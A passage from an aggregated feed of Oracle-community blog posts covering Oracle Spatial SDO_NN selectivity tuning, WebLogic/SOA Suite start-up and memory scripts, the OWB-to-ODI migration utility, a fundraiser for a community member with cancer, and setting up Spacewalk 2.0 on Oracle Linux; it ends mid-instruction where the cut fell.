If statistics are not associated, the CBO would also use a selectivity of 1%. So what is the difference? Under what circumstances could one take advantage of the Extensible Optimizer feature and generate better selectivity when the SDO_NN operator is used along with the sdo_num_res parameter? I couldn't find any article or piece of documentation that would help me answer these questions.

What I do know however, is that it shouldn't be that difficult to implement a piece of logic that will make SDO_STATISTICS.ODCIStatsSelectivity procedure generate more accurate numbers.

As a matter of fact, I played a bit with this.

Disclaimer: Please be aware the following examples are for demonstration purposes only and shouldn't be used in an actual, supported, database environment. The logic I show below is quite simple and is for illustration only. Please contact Oracle Support if you want to implement something similar in your environment.

I created a simple type named SDO_STATISTICS_CUSTOM under MDSYS schema using the Extensible Optimizer interface (link)

I implemented ODCIStatsSelectivity procedure as shown below (one more time, this implementation is to demonstrate that with appropriate logic ODCIStatsSelectivity can return desired values):



STATIC FUNCTION ODCIStatsSelectivity (
   pred_info IN SYS.ODCIPredInfo,
   sel OUT NUMBER,
   args IN SYS.ODCIArgDescList,
   p_start IN VARCHAR2,
   p_stop IN VARCHAR2,
   geometry1 IN MDSYS.SDO_GEOMETRY,
   geometry2 IN MDSYS.SDO_GEOMETRY,
   param IN VARCHAR2,
   env IN SYS.ODCIEnv
) RETURN NUMBER IS
BEGIN

   -- custom selectivity logic starts here
   IF param IS NULL THEN
      sel := 1;
   ELSIF lower(substr(param,1,instr(param,'=')-1)) = 'sdo_num_res' THEN
      -- selectivity (%) = sdo_num_res / num_rows * 100, based on the table statistics
      SELECT decode(num_rows, null, 1,
                    decode(to_number(trim(substr(param,instr(param,'=')+1))), 0, 1,
                           to_number(trim(substr(param,instr(param,'=')+1)))/num_rows)*100
             )
        INTO sel
        FROM dba_tables
       WHERE owner = args(3).TABLESCHEMA
         AND table_name = args(3).TABLENAME;

      IF sel > 100 THEN
         sel := 100;
      END IF;

   END IF;
   -- custom selectivity logic ends here

   RETURN ODCIConst.success;
END ODCIStatsSelectivity;



The logic I chose is simple: if the sdo_num_res parameter is defined, get the number of rows from the statistics available for the table and set the selectivity variable (sel) to (sdo_num_res/num_rows)*100.

Let's see how it works:


SQL> EXPLAIN PLAN FOR
2 SELECT t1.id, t2.id, t2.restaurants_id, t2.item_number
3 FROM restaurants t1
4 , menu_items t2
5 WHERE t1.id=t2.restaurants_id
6 AND SDO_NN(t1.point,
7 SDO_GEOMETRY(
8 2001 -- 2 dimensional point
9 , null
10 , SDO_POINT_TYPE(10,0,null)
11 , null
12 , null
13 ),
14 'sdo_num_res=5',
15 1
16 )='TRUE'
17* ORDER BY t1.id, t2.item_number
SQL> /

Explained.

SQL> set line 200 pagesize 9999
SQL> SELECT * FROM table(DBMS_XPLAN.DISPLAY);

PLAN_TABLE_OUTPUT
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Plan hash value: 2341889131

------------------------------------------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
------------------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 25 | 1000 | 36 (3)| 00:00:01 |
| 1 | SORT ORDER BY | | 25 | 1000 | 36 (3)| 00:00:01 |
| 2 | NESTED LOOPS | | 25 | 1000 | 35 (0)| 00:00:01 |
| 3 | TABLE ACCESS BY INDEX ROWID| RESTAURANTS | 5 | 80 | 0 (0)| 00:00:01 |
|* 4 | DOMAIN INDEX | RESTAURANTS_SIDX | | | 0 (0)| 00:00:01 |
| 5 | TABLE ACCESS BY INDEX ROWID| MENU_ITEMS | 5 | 120 | 7 (0)| 00:00:01 |
|* 6 | INDEX RANGE SCAN | MENU_ITEMS_RESTAURANTS_IDX | 5 | | 2 (0)| 00:00:01 |
------------------------------------------------------------------------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------

4 - access("MDSYS"."SDO_NN"("T1"."POINT","MDSYS"."SDO_GEOMETRY"(2001,NULL,"SDO_POINT_TYPE"(10,0,N
ULL),NULL,NULL),'sdo_num_res=5',1)='TRUE')
6 - access("T1"."ID"="T2"."RESTAURANTS_ID")

20 rows selected.


As you can see, the cardinality is correctly calculated, which led the CBO to produce a better execution plan. With this plan in place, the query completes in less than 1 cs.

If you look into 10053 trace file you can also see that the calculated selectivity is 0.001%:




MDSYS.SDO_STATISTICS_CUSTOM.ODCIStatsFunctionCost returned:
CPUCost : 10000
IOCost : 10000
NetworkCost : 10000
Calling user-defined selectivity function...
predicate: "MDSYS"."SDO_NN"("T1"."POINT","MDSYS"."SDO_GEOMETRY"(2001,NULL,"SDO_POINT_TYPE"(10,0,NULL),NULL,NULL),'sdo_num_res=5',1)='TRUE'
declare
sel number;
obj0 "MDSYS"."SDO_GEOMETRY" := "MDSYS"."SDO_GEOMETRY"(NULL, NULL, NULL, NULL, NULL);

begin
:1 := "MDSYS"."SDO_STATISTICS_CUSTOM".ODCIStatsSelectivity(
sys.ODCIPREDINFO('MDSYS',
'PRVT_IDX',
'NN',
45),
sel,
sys.ODCIARGDESCLIST(sys.ODCIARGDESC(3, NULL, NULL, NULL, NULL, NULL, NULL), sys.ODCIARGDESC(3, NULL, NULL, NULL, NULL, NULL, NULL), sys.ODCIARGDESC(2, 'RESTAURANTS', 'TEST', '"POINT"', NULL, NULL, NULL), sys.ODCIARGDESC(3, NULL, NULL, NULL, NULL, NULL, NULL), sys.ODCIARGDESC(3, NULL, NULL, NULL, NULL, NULL, NULL)),
:3,
:4
, obj0, "MDSYS"."SDO_GEOMETRY"(2001,NULL,"SDO_POINT_TYPE"(10,0,NULL),NULL,NULL), :5,
sys.ODCIENV(:6,:7,:8,:9));
if sel IS NULL then
:2 := -1.0;
else
:2 := sel;
end if;
exception
when others then
raise;
end;
Bind :3 Value 'TRUE'
Bind :4 Value 'TRUE'
Bind :5 Value 'sdo_num_res=5'
ODCIEnv Bind :6 Value 0
ODCIEnv Bind :7 Value 0
ODCIEnv Bind :8 Value 0
ODCIEnv Bind :9 Value 3
MDSYS.SDO_STATISTICS_CUSTOM.ODCIStatsSelectivity returned selectivity: 0.00100000%


Anyway, since the current implementation of the SDO_STATISTICS type returns a selectivity of 1%, the next logical question is what one can do in order to work around the problem.

Workaround

The problem can be addressed by giving the CBO that extra bit of information, that is, how many rows we expect to get back after applying the SDO_NN operator. In order to do this one could consider using the cardinality hint, or rewriting the query to add one more predicate, ROWNUM<=5, that tells the CBO how many rows we expect to select from the RESTAURANTS table (there may be other strategies available too).

Use cardinality hint:

SELECT /*+ cardinality(t1 5) gather_plan_statistics */ t1.id, t2.id, t2.restaurants_id, t2.item_number
FROM restaurants t1
, menu_items t2
WHERE t1.id=t2.restaurants_id
AND SDO_NN(t1.point,
SDO_GEOMETRY(
2001 -- 2 dimensional point
, null
, SDO_POINT_TYPE(10,0,null)
, null
, null
),
'sdo_num_res=5',
1
)='TRUE'
ORDER BY t1.id, t2.item_number;


The execution statistics in this case look like:

Plan hash value: 2341889131


PLAN_TABLE_OUTPUT
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers | Reads | OMem | 1Mem | Used-Mem |
----------------------------------------------------------------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 25 |00:00:00.01 | 92 | 5 | | | |
| 1 | SORT ORDER BY | | 1 | 25 | 25 |00:00:00.01 | 92 | 5 | 2048 | 2048 | 2048 (0)|
| 2 | NESTED LOOPS | | 1 | 25 | 25 |00:00:00.01 | 92 | 5 | | | |
| 3 | TABLE ACCESS BY INDEX ROWID| RESTAURANTS | 1 | 5 | 5 |00:00:00.01 | 55 | 0 | | | |
|* 4 | DOMAIN INDEX | RESTAURANTS_SIDX | 1 | | 5 |00:00:00.01 | 54 | 0 | | | |
| 5 | TABLE ACCESS BY INDEX ROWID| MENU_ITEMS | 5 | 5 | 25 |00:00:00.01 | 37 | 5 | | | |
|* 6 | INDEX RANGE SCAN | MENU_ITEMS_RESTAURANTS_IDX | 5 | 5 | 25 |00:00:00.01 | 12 | 0 | | | |
----------------------------------------------------------------------------------------------------------------------------------------------------------

PLAN_TABLE_OUTPUT
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------

4 - access("MDSYS"."SDO_NN"("T1"."POINT","MDSYS"."SDO_GEOMETRY"(2001,NULL,"SDO_POINT_TYPE"(10,0,NULL),NULL,NULL),'sdo_num_res=5',1)='TRUE')
6 - access("T1"."ID"="T2"."RESTAURANTS_ID")


29 rows selected.


Rewrite the query and use a ROWNUM<=n predicate, where n is the number associated with the sdo_num_res parameter:

SELECT /*+ gather_plan_statistics */ t1.id, t2.id, t2.restaurants_id, t2.item_number
FROM (SELECT *
FROM restaurants
WHERE
SDO_NN(point,
SDO_GEOMETRY(
2001 -- 2 dimensional point
, null
, SDO_POINT_TYPE(10,0,null)
, null
, null
),
'sdo_num_res=5',
1
)='TRUE'
AND rownum<=5
) t1
, menu_items t2
WHERE t1.id=t2.restaurants_id
ORDER BY t1.id, t2.item_number;


… and the execution statistics :

Plan hash value: 3570932640

----------------------------------------------------------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers | OMem | 1Mem | Used-Mem |
----------------------------------------------------------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 25 |00:00:00.01 | 101 | | | |
| 1 | SORT ORDER BY | | 1 | 25 | 25 |00:00:00.01 | 101 | 2048 | 2048 | 2048 (0)|
| 2 | NESTED LOOPS | | 1 | | 25 |00:00:00.01 | 101 | | | |
| 3 | NESTED LOOPS | | 1 | 25 | 25 |00:00:00.01 | 76 | | | |
| 4 | VIEW | | 1 | 5 | 5 |00:00:00.01 | 64 | | | |
|* 5 | COUNT STOPKEY | | 1 | | 5 |00:00:00.01 | 64 | | | |
| 6 | TABLE ACCESS BY INDEX ROWID| RESTAURANTS | 1 | 5 | 5 |00:00:00.01 | 64 | | | |
|* 7 | DOMAIN INDEX | RESTAURANTS_SIDX | 1 | | 5 |00:00:00.01 | 63 | | | |
|* 8 | INDEX RANGE SCAN | MENU_ITEMS_RESTAURANTS_IDX | 5 | 5 | 25 |00:00:00.01 | 12 | | | |
| 9 | TABLE ACCESS BY INDEX ROWID | MENU_ITEMS | 25 | 5 | 25 |00:00:00.01 | 25 | | | |
----------------------------------------------------------------------------------------------------------------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------

5 - filter(ROWNUM<=5)
7 - access("MDSYS"."SDO_NN"("POINT","MDSYS"."SDO_GEOMETRY"(2001,NULL,"SDO_POINT_TYPE"(10,0,NULL),NULL,NULL),'sdo_num_res=5',1)='TRUE')
8 - access("T1"."ID"="T2"."RESTAURANTS_ID")


34 rows selected.


As you can see, the Oracle CBO made correct cardinality estimates in the last two examples and used the NESTED LOOPS method to join both tables, which resulted in a performance improvement.

I hope you got some valuable information out of this post.

Postscript on Scripts

Antony Reynolds - Fri, 2013-11-15 17:07
More Scripts for SOA Suite

Over time I have evolved my startup scripts and thought it would be a good time to share them.  They are available for download here.  I have finally converted to using WLST, which has a number of advantages.  To me the biggest advantage is that the output and log files are automatically written to a consistent location in the domain directory or node manager directory.  In addition the WLST scripts wait for the component to start and then return; this lets us string commands together without worrying about the dependencies.

The following are the key scripts (available for download here):

Script                      Description                         Pre-Reqs              Stops when Task Complete
startWlstNodeManager.sh     Starts Node Manager using WLST      None                  Yes
startNodeManager.sh         Starts Node Manager                 None                  Yes
stopNodeManager.sh          Stops Node Manager using WLST       Node Manager running  Yes
startWlstAdminServer.sh     Starts Admin Server using WLST      Node Manager running  Yes
startAdminServer.sh         Starts Admin Server                 None                  No
stopAdminServer.sh          Stops Admin Server                  Admin Server running  Yes
startWlstManagedServer.sh   Starts Managed Server using WLST    Node Manager running  Yes
startManagedServer.sh       Starts Managed Server               None                  No
stopManagedServer.sh        Stops Managed Server                Admin Server running  Yes

Samples

To start Node Manager and Admin Server

startWlstNodeManager.sh ; startWlstAdminServer.sh

To start Node Manager, Admin Server and SOA Server

startWlstNodeManager.sh ; startWlstAdminServer.sh ; startWlstManagedServer.sh soa_server1

Note that the Admin server is not started until the Node Manager is running, similarly the SOA server is not started until the Admin server is running.

Node Manager Scripts

startWlstNodeManager.sh

Uses WLST to start the Node Manager.  When the script completes the Node manager will be running.

startNodeManager.sh

The Node Manager is started in the background and the output is piped to the screen. This causes the Node Manager to continue running in the background if the terminal is closed. Log files, including a .out capturing standard output and standard error, are placed in the <WL_HOME>/common/nodemanager directory, making them easy to find. This script pipes the output of the log file to the screen and keeps doing this until terminated. Terminating the script does not terminate the Node Manager.

stopNodeManager.sh

Uses WLST to stop the Node Manager.  When the script completes the Node manager will be stopped.

Admin Server Scripts

startWlstAdminServer.sh

Uses WLST to start the Admin Server.  The Node Manager must be running before executing this command.  When the script completes the Admin Server will be running.

startAdminServer.sh

The Admin Server is started in the background and the output is piped to the screen. This causes the Admin Server to continue running in the background if the terminal is closed.  Log files, including the .out capturing standard output and standard error, are placed in the same location as if the server had been started by Node Manager, making them easy to find.  This script pipes the output of the log file to the screen and keeps doing this until terminated. Terminating the script does not terminate the server.

stopAdminServer.sh

Stops the Admin Server.  When the script completes the Admin Server will no longer be running.

Managed Server Scripts

startWlstManagedServer.sh <MANAGED_SERVER_NAME>

Uses WLST to start the given Managed Server. The Node Manager must be running before executing this command. When the script completes the given Managed Server will be running.

startManagedServer.sh <MANAGED_SERVER_NAME>

The given Managed Server is started in the background and the output is piped to the screen. This causes the given Managed Server to continue running in the background if the terminal is closed. Log files, including the .out capturing standard output and standard error, are placed in the same location as if the server had been started by Node Manager, making them easy to find. This script pipes the output of the log file to the screen and keeps doing this until terminated. Terminating the script does not terminate the server.

stopManagedServer.sh <MANAGED_SERVER_NAME>

Stops the given Managed Server. When the script completes the given Managed Server will no longer be running.

Utility Scripts

The following scripts are not called directly but are used by the previous scripts.

_fmwenv.sh

This script provides information about the Node Manager and the WebLogic domain, and must be edited to reflect the installed FMW environment (a sketch with illustrative values follows the lists below). In particular the following values must be set:

  • DOMAIN_NAME – the WebLogic domain name.
  • NM_USERNAME – the Node Manager username.
  • NM_PASSWORD – the Node Manager password.
  • MW_HOME – the location where WebLogic and other FMW components are installed.
  • WEBLOGIC_USERNAME – the WebLogic Administrator username.
  • WEBLOGIC_PASSWORD - the WebLogic Administrator password.

The following values may also need changing:

  • ADMIN_HOSTNAME – the server where AdminServer is running.
  • ADMIN_PORT – the port number of the AdminServer.
  • DOMAIN_HOME – the location of the WebLogic domain directory, defaults to ${MW_HOME}/user_projects/domains/${DOMAIN_NAME}
  • NM_LISTEN_HOST – the Node Manager listening hostname, defaults to the hostname of the machine it is running on.
  • NM_LISTEN_PORT – the Node Manager listening port.
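A sketch of _fmwenv.sh, using the variable names listed above with purely illustrative values (adjust every value for your own installation):

# _fmwenv.sh - environment for the start/stop scripts (illustrative values only)
DOMAIN_NAME=soa_domain
NM_USERNAME=nodemanager
NM_PASSWORD=welcome1
MW_HOME=/u01/app/oracle/middleware
WEBLOGIC_USERNAME=weblogic
WEBLOGIC_PASSWORD=welcome1

# Values that may also need changing
ADMIN_HOSTNAME=adminhost.example.com
ADMIN_PORT=7001
DOMAIN_HOME=${MW_HOME}/user_projects/domains/${DOMAIN_NAME}
NM_LISTEN_HOST=`hostname`
NM_LISTEN_PORT=5556
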
_runWLst.sh

This script runs the WLST script passed in environment variable ${SCRIPT} and takes its configuration from _fmwenv.sh.  It dynamically builds a WLST properties file in the /tmp directory to pass parameters into the scripts.  The properties filename is of the form <DOMAIN_NAME>.<PID>.properties.

_runAndLog.sh

This script runs the command passed in as an argument, writing standard out and standard error to a log file.  The log file is rotated between invocations to avoid losing the previous log files.  The log file is then tailed and output to the screen.  This means that this script will never finish by itself.
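As a rough sketch only (the real script derives its own log file name and may rotate differently), the gist of _runAndLog.sh is:

CMD="$*"                                      # the command to run is passed in as arguments
LOG="${DOMAIN_HOME}/logs/runAndLog.out"       # hypothetical location; the real script picks its own name
[ -f "${LOG}" ] && mv "${LOG}" "${LOG}.prev"  # rotate the previous log so it is not lost
nohup ${CMD} > "${LOG}" 2>&1 &                # capture standard out and standard error
tail -f "${LOG}"                              # tail the log to the screen; never finishes by itself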

WLST Scripts

The following WLST scripts are used by the scripts above, taking their properties from /tmp/<DOMAIN_NAME>.<PID>.properties:

  • startNodeManager.py
  • stopNodeManager.py
  • startServer.py
  • startServerNM.py
Relationships

The dependencies and relationships between my scripts and the built in scripts are shown in the diagram below.

Thanks for the Memory

Antony Reynolds - Fri, 2013-11-15 15:28
Controlling Memory in Oracle SOA Suite

Within WebLogic you can specify the memory to be used by each managed server in the WebLogic console.  Unfortunately if you create a domain with Oracle SOA Suite it adds a new config script, setSOADomainEnv.sh, that overwrites any USER_MEM_ARGS passed in to the start scripts.  setDomainEnv.sh only sets a single set of memory arguments that are used by all servers, so an admin server gets the same memory parameters as a BAM server.  This means some servers will have more memory than they need and others will be too tightly constrained.  This is a bad thing.

A Solution

To overcome this I wrote a small script, setMem.sh, that checks to see which server is being started and then sets the memory accordingly.  It supports up to 9 different server types, each identified by a prefix.  If the prefix matches then the max and min heap and max and min perm gen are set.  Settings are controlled through variables set in the script. If using JRockit, leave the PERM settings empty and they will not be set.

SRV1_PREFIX=Admin
SRV1_MINHEAP=768m
SRV1_MAXHEAP=1280m
SRV1_MINPERM=256m
SRV1_MAXPERM=512m

The above settings match any server whose name starts with Admin.  They will result in the following USER_MEM_ARGS value:

USER_MEM_ARGS=-Xms768m -Xmx1280m -XX:PermSize=256m -XX:MaxPermSize=512m

If the prefix were soa then it would match soa_server1, soa_server2 etc.

There is a set of DEFAULT_ values that allow you to default the memory settings and only set them explicitly for servers that have settings different from your default.  Note that there must still be a matching prefix, otherwise the USER_MEM_ARGS will be the ones from setSOADomainEnv.sh.
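For illustration, here is a minimal sketch of the kind of prefix matching setMem.sh performs. It is not the actual script; it assumes the WebLogic start scripts have already set SERVER_NAME before setDomainEnv.sh (and therefore setMem.sh) runs:

i=1
while [ $i -le 9 ]; do
  eval PREFIX=\"\${SRV${i}_PREFIX}\"
  # Does the name of the server being started begin with this prefix?
  if [ -n "${PREFIX}" ] && [ "${SERVER_NAME#$PREFIX}" != "${SERVER_NAME}" ]; then
    eval MINHEAP=\"\${SRV${i}_MINHEAP}\"
    eval MAXHEAP=\"\${SRV${i}_MAXHEAP}\"
    eval MINPERM=\"\${SRV${i}_MINPERM}\"
    eval MAXPERM=\"\${SRV${i}_MAXPERM}\"
    USER_MEM_ARGS="-Xms${MINHEAP} -Xmx${MAXHEAP}"
    # Perm gen flags are only added when set, so for JRockit the PERM variables stay empty
    [ -n "${MINPERM}" ] && USER_MEM_ARGS="${USER_MEM_ARGS} -XX:PermSize=${MINPERM}"
    [ -n "${MAXPERM}" ] && USER_MEM_ARGS="${USER_MEM_ARGS} -XX:MaxPermSize=${MAXPERM}"
    export USER_MEM_ARGS
    break
  fi
  i=`expr $i + 1`
done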

This script needs to be called from setDomainEnv.sh.  Add the call immediately before the following lines:

if [ "${USER_MEM_ARGS}" != "" ] ; then
        MEM_ARGS="${USER_MEM_ARGS}"
        export MEM_ARGS
fi

The script can be downloaded here.

Thoughts on Memory Setting

I know conventional wisdom is that Xms (initial heap size) and Xmx (max heap size) should be set the same to avoid needing to allocate memory after startup.  However I don’t agree with this.  Setting Xms==Xmx works great if you are omniscient; I don’t claim to be omniscient, my omni is a little limited, so I prefer to set Xms to what I think the server needs, which is what I would set it to if I were setting the parameters to be Xms=Xmx.  However I like to then set Xmx to be a little higher than I think the server needs.  This allows me to get the memory requirement wrong and not have my server fail due to out of memory.  In addition I can now monitor the server, and if the heap memory usage goes above my Xms setting I know that I calculated wrong and I can change the Xms setting and restart the servers at a suitable time.  Setting them not equal buys me time to fix increased memory needs, for example due to a change in usage patterns or new functionality; it also allows me to be less than omniscient.

ps Please don’t tell my children I am not omniscient!

OWB to ODI Migration Utility released.

Antonio Romero - Fri, 2013-11-15 14:30

The much awaited OWB to ODI Migration utility has been released.

The migration utility is a command-line tool that enables you to migrate design-time metadata from OWB 11.2.0.4 to ODI 12c. The migration utility is provided in patch number 17547241 for your OWB 11gR2 (11.2.0.4) installation.

Migration is supported on Linux 64-bit x86 systems only. Before migrating, ensure that the following requirements are met:

  • OWB 11.2.0.4 installed (OWB 11.2.0.4 plus patch number 17547241)

  • ODI 12.1.2.0.0 installed (ODI 12.1.2.0.0 plus patch number 17053768)

ODI is Oracle's strategic product for heterogeneous data integration. Because many Oracle Database customers have significant investment in OWB, Oracle supports a phased migration from OWB 11gR2 (11.2.0.4) to ODI 12c (12.1.2).

  • ODI 12c supports an easier mapping between OWB 11gR2 concepts and objects and their ODI 12c counterparts. A migration utility is provided that automatically translates many OWB objects and mappings into their ODI equivalents. More information about the migration utility is available here:

http://docs.oracle.com/middleware/1212/odi/ODIMG/index.html

In addition to enabling the migration, the ODI 12c patch also comes with new components such as Pivot, Unpivot, Subquery Filter and Table Functions. They are documented in the following appendix:
http://docs.oracle.com/middleware/1212/odi/ODIDG/app_12c_patch.htm


The Riley Family, Part II

Chet Justice - Tue, 2013-11-12 22:13
You didn't miss Part I, at least not here you didn't.

Many of you know Mike Riley. If you don't, here's a little history. He's the past president of ODTUG (for like 37 years or something) and for the last two years, he's served as Conference Chair for Kscope. Yeah, that doesn't really follow, but you know I'm a bit...scattered.

Did you read the link above? OK, well, here's the skinny. Mike has rectal cancer. Stage III. If it weren't for the stupid cancer part, the jokes would abound. Oh wait, they do anyway. Mike was diagnosed shortly after #kscope13, right around his 50th birthday (Happy Birthday Mike, Love, Cancer!). Ugh. (I want to say, "are you shittin' me?" see what I mean about the jokes? I can't help myself, I'm 14). Needless to say, cancer isn't really a joke. We all know someone affected by it. It is...well, it's not fun.

Go read his post if you haven't already. I'm going to give my version of that story. I'll wait...

So, Sunday morning, Game 3 of the World Series went to the Cardinals in a very bizarre way. I was watching highlights that morning as I had missed the end of the game (doesn't everyone know that I'm old and can't stay up that late to watch baseball?). Highlights. Mike lives in St. Louis. He's a Cardinals fan. Wouldn't it be cool if he and his family could go to the game (mostly just his family, I don't like Mike that much)? So I make some phone calls to see what people think of my idea. My idea is met with resistance. OK, I'll skip the people. Let's call Lisa (Mike's wife).

Apparently Sundays are technology-free days in the Riley household; no response. I go for a bike ride, but I take my phone, just in case Lisa calls me back. After the halfway point, my phone rings; I jump off the bike to answer.

So I talked to Lisa about my idea: can Mike handle the chaos of a World Series game?

We hang up and she goes to work. BTW, I asked her to keep my name out of it, but she didn't. We'll have words about that in the future.

She calls back (I think, it may have been over text, 2 weeks is an eternity to me). "He doesn't think he can do it."

So I call Mike directly (Lisa had already spoiled the surprise.)

"What about Box seats? You know, where the people with top hats and monocles sit? Away from the rift-raft, much more comfortable and free food and beer."

Backstory. Mike had finished his first round of chemo less than a week before Sunday. To make things worse, he decided it was a good time to throw out his back. He wasn't in the best of shape.

Mike said he thought he could do it.

OK, naysayers aside, let's see what we can do. I emailed approximately 50 people, mostly ODTUG people: board members, content leads, anyone I had in my address book. "Hey, wouldn't it be great to send Mike and his family to Game 5 of the World Series? We need to do this quickly; tickets will probably double in price tonight, especially if the Cardinals win." (That would mean Game 5 would be a clincher for the Cardinals, at home, muy expensive.)

Within about 20 minutes, a couple of people pledged $600.

Holy shit!

At the prices I had seen, I was hoping to get between $50 and $100 from 50 people, hoping. I had $600 already. Game starts. Now it's up to $1100 in pledges. Holy shit, Part II. This might just be possible. Another 30 minutes and we're about an hour into Game 4. Ticket prices have already gone up by $250 a ticket. Given that maybe 4 people have responded and I have $1600 in pledges, I pull the trigger. I bought 4 box seat tickets for the Riley family. (I had to have a couple of beers because I was about to drop a significant chunk of change without actual cash in hand; I could be out a lot of money; liquid courage is awesome.)

Tickets sent to the Riley family. Pretty good feeling.

Like I said, I was confident, but I was scared. Before the end of the night though, there was over $5K pledged to get Mike and family to Game 5. Holy shit, Part III.

By midday Monday, pledges were well over $7K. I'll refer you back to Mike's post for more details. Shorter: jerseys for the family and a limo to the game.

Here's the breakdown: 35 people pledged, and paid, $8,080. Holy shit, Part IV. Average donation was $230.86. Median was $200. Low was $30 and high was $1000. Six people gave $500 or more. Nineteen people gave $200 or more. The list is a veritable Who's Who in the Oracle community.

Tickets + Jerseys + Limo = $6027.76

Riley family memory = Priceless.

So, what happened to the rest? Well, they have bills. Lots of bills. With the remainder, $2052.24, we paid off some hospital bills of $1220.63. There is currently $831.61 that will be sent shortly. It doesn't stop there though. Cancer treatment is effing expensive. Mike has surgery in December. He'll be on bed rest for some time. His bed is 17 years old. He needs a new one. After that, more chemo and more bills.

"Hey Chet, I'd love to help the Riley family out, can I give you my money for them?"

Yes, absolutely. Help me help them. I started a GoFundMe campaign. Goal is $10K. Any and all donations are welcome. Gifts include a thank you card from the Riley family and the knowledge that you helped out a fellow Oracle (nerd, definitely a nerd) in need. You can find the campaign here.

If you can't donate money, I've also created a hashtag so that we can show support for Mike and his family. It's #fmcuta (I'll let you figure out what it means). Words of encouragement are welcome and appreciated.

Thank you to the 35 who have already so generously given. Thank you to the rest of you who will donate or send out (rude) tweets.
Categories: BI & Warehousing

Spacewalk 2.0 provided to manage Oracle Linux systems

Wim Coekaerts - Mon, 2013-11-11 15:33
Oracle Linux customers have a few options to manage and provision their servers. We provide a license to use Oracle Enterprise Manager's Linux OS management, monitoring and provisioning features without additional cost for every server that has an Oracle Linux support subscription. So there is no additional pack to license and no additional per-server cost; it's all included in our Basic, Premier and Systems support subscriptions. The nice thing about Oracle Enterprise Manager is that you end up with a single management product that can manage all aspects of your software stack. You have complete insight into the applications running, you have roles and responsibilities, you have third-party connectors for storage or other products, and it makes it very easy and convenient to correlate data and events when something happens. If you use Oracle VM as well, you end up with a complete cloud portal with self-service, chargeback, and so on.

Another, much simpler, option is just using yum. It is very easy to take a server, create directories, and expose these through Apache as repositories. You can have a simple yum config on each server pointing to a few specific repositories. It requires some manual effort in terms of creating directories, downloading packages and creating local repo files, but it is easy to do and for many people a preferred solution.
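As a rough sketch of that manual approach (the paths, repository name and host name below are purely illustrative, and it assumes the httpd and createrepo packages are installed), the server side boils down to creating a directory, generating yum metadata and serving it with Apache, while each client only needs a small .repo file:

# On the repository server
mkdir -p /var/www/html/repo/ol6
cp /path/to/downloaded/rpms/*.rpm /var/www/html/repo/ol6/
createrepo /var/www/html/repo/ol6      # generate the yum metadata
service httpd start

# On each client, create /etc/yum.repos.d/local-ol6.repo containing:
[local-ol6]
name=Local Oracle Linux 6 repository
baseurl=http://yourrepohost/repo/ol6/
# set gpgcheck=1 and add a gpgkey= line if you sign and verify the packages
gpgcheck=0
enabled=1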

There are also a good number of customers who just connect their servers directly to ULN or to our free update server, public-yum. Just to reiterate: our public-yum servers have all the errata and updates available for free.

Now we have added another option. Many of our customers have switched from a competing Linux vendor and are familiar with that vendor's management tools. Switching to Oracle for support is very easy since we don't require changes to the installed servers, but we also want to make sure there is a very easy and almost transparent switch for the management tools as well. While Oracle Enterprise Manager is our preferred way of managing systems, we are now offering Spacewalk 2.0 to our customers. The community project can be found here. We have made a few changes to ensure easy and complete support for Oracle Linux, tested it with public-yum, and so on. You can find the RPMs in our public-yum repos at http://public-yum.oracle.com/repo/OracleLinux/OL6/. There are repositories for the Spacewalk server, and for each version (OL5, OL6) and architecture (x86 and x86-64) we have the client repositories as well. Spacewalk itself is only made available for OL6 x86-64.

Documentation can be found here.

I set it up myself and here are some quick steps on how you can get going in just a matter of minutes:

Spacewalk Server Installation :

1) Installing an Oracle Database

Use an existing Oracle Database or install a new Oracle Database (Standard or Enterprise Edition) [at this time use 11g; we will add support for 12c in the near future]. This database can be installed on the Spacewalk server or on a separate remote server.

While Oracle XE might work for a small sample POC, we do not support the use of Oracle XE; Spacewalk repositories can become large and create a significant database workload.

Customers can use their existing database licenses or download the database with a trial license from http://edelivery.oracle.com; alternatively, Oracle Linux subscribers (customers) will be allowed to use the Oracle Database as a Spacewalk repository as part of their Oracle Linux subscription at no additional cost.

|NOTE: Spacewalk requires the database to be configured with the UTF8 character set
|(AL32UTF8 in Oracle). Installation will fail if your database does not use UTF8.
|To verify that your database is configured correctly, run the following query in sqlplus:
|
|select value from nls_database_parameters where parameter='NLS_CHARACTERSET';
|
|This should return 'AL32UTF8'.
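
If you prefer to run that check from the shell, a one-liner along the following lines works as well; the credentials and connect string are placeholders to replace with your own, and it assumes sqlplus is on the PATH:

echo "select value from nls_database_parameters where parameter='NLS_CHARACTERSET';" | \
  sqlplus -s system/yourpassword@//dbhost:1521/orcl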

2) Configure the database schema for spacewalk

Ideally, create a tablespace in the database to hold the Spacewalk schema tables and data:

create tablespace spacewalk datafile '/u01/app/oracle/oradata/orcl/spacewalk.dbf'
 size 10G autoextend on;

Create the database user spacewalk (or use some other schema name) in sqlplus.

example :

 create user spacewalk identified by spacewalk;
 grant connect, resource to spacewalk;
 grant create table, create trigger, create synonym, create view, 
 alter session to spacewalk;
 grant unlimited tablespace to spacewalk;
 alter user spacewalk default tablespace spacewalk;

3) Spacewalk installation and configuration

The Spacewalk server requires an Oracle Linux 6 x86-64 system and is only supported on OL6 64-bit. Clients can be Oracle Linux 5 or 6, both 32-bit and 64-bit.

The easiest way to get started is to do a 'Minimal' install of Oracle Linux on the server. Once you have that minimal install, modify your yum configuration to include the Spacewalk repository from public-yum.

Example :

Edit /etc/yum.repos.d/public-yum-ol.repo and add the following lines at the end of the file:

[spacewalk]
name=spacewalk
baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/spacewalk20/server/$basearch/
gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
gpgcheck=1
enabled=1
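
A quick, optional sanity check after saving the file is to ask yum for its repository list; the repo id it prints will match the [spacewalk] section name above:

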